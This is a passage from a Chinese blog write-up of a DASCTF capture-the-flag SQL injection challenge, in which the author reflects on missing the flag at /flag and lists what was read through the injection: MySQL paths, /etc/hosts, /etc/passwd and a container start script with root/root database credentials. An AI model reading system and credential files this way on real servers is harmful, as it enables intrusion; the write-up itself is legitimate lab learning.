<p>数据库里写的<code>flag.txt</code>，最后却在根目录<code>/flag</code>。尝试过十六进制<code>/flag</code>读取，可能是因为太卡了，没成功就没再试了，以为就是<code>flag.txt</code>。盲猜有人拿到注入题直接sqlmap开始跑，导致服务器负载太大，或者说运维去三亚了2333</p>
<p>还尝试了读取一堆无用的东西，以为和 <a href="/article/Buuoj-WEB-Write-up/#Comment">[网鼎杯 2018]Comment</a> </p>
<pre class="language-shell" data-language="shell"><code class="language-shell"><span class="token comment"># @@datadir</span>
<span class="token comment"># /var/lib/mysql/</span>

<span class="token comment"># @@basedir</span>
<span class="token comment"># /usr/</span>

<span class="token comment"># /etc/host</span>
<span class="token comment"># 127.0.0.1	localhost</span>
<span class="token comment"># ::1	localhost ip6-localhost ip6-loopback</span>
<span class="token comment"># fe00::0	ip6-localnet</span>
<span class="token comment"># ff00::0	ip6-mcastprefix</span>
<span class="token comment"># ff02::1	ip6-allnodes</span>
<span class="token comment"># ff02::2	ip6-allrouters</span>
<span class="token comment"># 192.168.0.114	9fa7a3d75b4f</span>

<span class="token comment"># /etc/passwd</span>
<span class="token comment"># root:x:0:0:root:/root:/bin/bash</span>
<span class="token comment"># daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span>
<span class="token comment"># bin:x:2:2:bin:/bin:/usr/sbin/nologin</span>
<span class="token comment"># sys:x:3:3:sys:/dev:/usr/sbin/nologin</span>
<span class="token comment"># sync:x:4:65534:sync:/bin:/bin/sync</span>
<span class="token comment"># games:x:5:60:games:/usr/games:/usr/sbin/nologin</span>
<span class="token comment"># man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span>
<span class="token comment"># lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span>
<span class="token comment"># mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span>
<span class="token comment"># news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span>
<span class="token comment"># uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span>
<span class="token comment"># proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span>
<span class="token comment"># www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span>
<span class="token comment"># backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span>
<span class="token comment"># list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span>
<span class="token comment"># irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span>
<span class="token comment"># gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span>
<span class="token comment"># nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span>
<span class="token comment"># _apt:x:100:65534::/nonexistent:/usr/sbin/nologin</span>
<span class="token comment"># mysql:x:101:101:MySQL Server,,,:/var/lib/mysql/:/bin/false</span></code></pre>

<p>没有线索，盲猜读了个<code>start.sh</code></p>
<pre class="language-sh" data-language="sh"><code class="language-sh">#!&#x2F;bin&#x2F;bash

rm -rf &#x2F;var&#x2F;run&#x2F;mysqld&#x2F;mysqld.sock.lock
rm -rf &#x2F;tmp&#x2F;mysql.sock
usermod -d &#x2F;var&#x2F;lib&#x2F;mysql&#x2F; mysql
ln -s &#x2F;var&#x2F;lib&#x2F;mysql&#x2F;mysql.sock &#x2F;tmp&#x2F;mysql.sock
chown -R mysql:mysql &#x2F;var&#x2F;lib&#x2F;mysql

mysqld_safe &amp;

mysql_ready() &#123;
	mysqladmin ping --socket&#x3D;&#x2F;run&#x2F;mysqld&#x2F;mysqld.sock --user&#x3D;root --password&#x3D;root &gt; &#x2F;dev&#x2F;null 2&gt;&amp;1
&#125;

while !(mysql_ready)
do
	echo &quot;waiting for mysql ...&quot;
	sleep 3
done

mysql -e &quot;ALTER USER &#39;root&#39;@&#39;localhost&#39; IDENTIFIED WITH mysql_native_password BY &#39;root&#39;;flush privileges;&quot; -uroot -proot

if [[ -f &#x2F;db.sql ]]; then
    mysql -e &quot;source &#x2F;db.sql&quot; -uroot -proot
    rm -f &#x2F;db.sql
fi

if [[ -f &#x2F;flag.sh ]]; then
	source &#x2F;flag.sh
fi

apache2-foreground</code></pre>

<p>然后开始爆<code>/proc/[id]/fd/[id]</code>一去不复返了。平台弄卡也有我的一份～</p>
<p>甚至还读了apache配置文件等等等，实在是经验不足，还是本人太菜了2333</p>
<p>做个反思吧，也许哪天羞耻心爆发这段就给我删了。</p>
<p>写给他人明鉴，写给自己反思。</p>
</div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>gyy</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://err0r.top/article/mardasctf/" title="DASCTF三月赛">https://err0r.top/article/mardasctf/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/article/phpstormdebug/" rel="prev" title="docker-php+mysql配置debug环境"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">docker-php+mysql配置debug环境</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/article/Nepctf2021/" rel="next" title="NepCTF2021"><span class="post-nav-text">NepCTF2021</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>若您想及时得到回复提醒，建议私发邮件联系。</span><br><span>评论请遵守评论公德，博主会不定时检查评论并进行回复。</span><br></div><div id="waline"></div><script>Yun.utils.getScript("https://cdn.jsdelivr.net/npm/@waline/client/dist/Waline.min.js", () => {
  const walineConfig = {"enable":true,"serverURL":"https://comments-err0rcm.vercel.app","comment":true,"visitor":false,"el":"#waline","lang":"zh-CN"}
  walineConfig.path = "/article/mardasctf/"
  new Waline(walineConfig)
}, window.Waline);</script></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" target="_blank">苏ICP备20028116号-1</a></div><div class="copyright"><span>&copy; 2020 – 2021 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> gyy</span></div><div class="live_time"><span>本博客已在各种灾难中运行了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2020-10-20T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span></div></footer><a class="hty-icon-button" id="goUp" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#000000" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="想要搜些什么？" value=""></div><div id="local-search-result"></div></div><script>const date = new Date();
const today = (date.getMonth() + 1) + "-" + date.getDate()
const mourn_days = ["4-4","9-18","12-13"]
if (mourn_days.includes(today)) {
  document.documentElement.style.filter = "grayscale(1)";
}</script></div><!-- hexo-inject:begin --><!-- hexo-inject:end --></body></html>